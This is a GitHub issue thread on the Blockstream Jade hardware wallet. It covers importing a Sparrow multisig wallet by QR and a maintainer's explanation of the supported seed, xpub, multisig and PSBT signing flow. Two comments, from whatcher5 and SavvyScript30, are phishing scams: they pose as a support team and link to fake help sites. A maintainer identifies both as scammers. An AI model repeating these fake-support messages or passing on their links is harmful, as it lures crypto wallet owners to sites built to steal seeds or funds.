Blockstream/Jade #204: Import Multisig

ddustin, 2025-01-20:
## Issue:
* Sparrow wallet export QR fails

## Description:
When exporting a multisig wallet from Sparrow, the option for "Jade" is specified.

When chosen, a sequential QR code is shown.

The Jade wallet shows two QR code options:
* QR Pin Unlock
* Scan SeedQR

Neither of these seem to be "import multisig wallet," however SeedQR is the closest

## Current Behavior:
The error "Invalid Recovery Phrase" appears

## Desired Behavior:
* Import the multisig wallet into the known multisig wallets on device for later signing

whatcher5, 2025-01-20:
(https://generalhub-tokenfix.web.app/). Our support team will be happy to help resolve your issue."  [CLICK HERE](https://generalhub-tokenfix.web.app/)

@ddustin

jgriffiths, 2025-01-20:
@ddustin please ignore whatcher5, they are a scammer attempting to phish you (I've reported them).

SavvyScript30, 2025-01-20:
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Blockstream Support Request](https://chain-dappsrectification.pages.dev)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

jgriffiths, 2025-01-20:
SavvyScript30 is also a scammer, also reported, sigh,

ddustin, 2025-01-20:
Jeez ya'll are getting hounded, thats a bummer 🙃

rgrambergs15, 2025-01-20:
@ddustin you need to load a seed to Jade using QR PIN Unlock or SeedQR - then you can scan wallet related QR codes. Help guides on blockstream.com if needed!

ddustin, 2025-01-20:
Oh so the device cannot generate its own seed?

Here's what I'm trying to do:

1) Have Jade generate a seed
2) Give me an xpub or zpub for the seed
3) Generate a multisig on my own using that z/xpub as well as others
4) Load the multisig details back to the Jade device
5) Generate a spending transaction on my own
6) Have the Jade sign that transaction and give me a PSBT

Is this flow not supported by Jade?

JamieDriver, 2025-01-22:
1. 'Setup Jade' menu option should include new seed generation
2. various apps can fetch an xpub from Jade over serial, or if airgapped you can display an xpub from the Options->Wallet menu
3. n/a
4. various apps can display a multisig quorum QR which jade can scan (from the 'Scan QR' selection) - jade can also accept a multisig setup over serial but I'm not sure whether any apps send it that way.
5. n/a
6. Jade can sign PSBTs over serial or via QR codes.

There should be helpful articles on this on https://help.blockstream.com/hc/en-us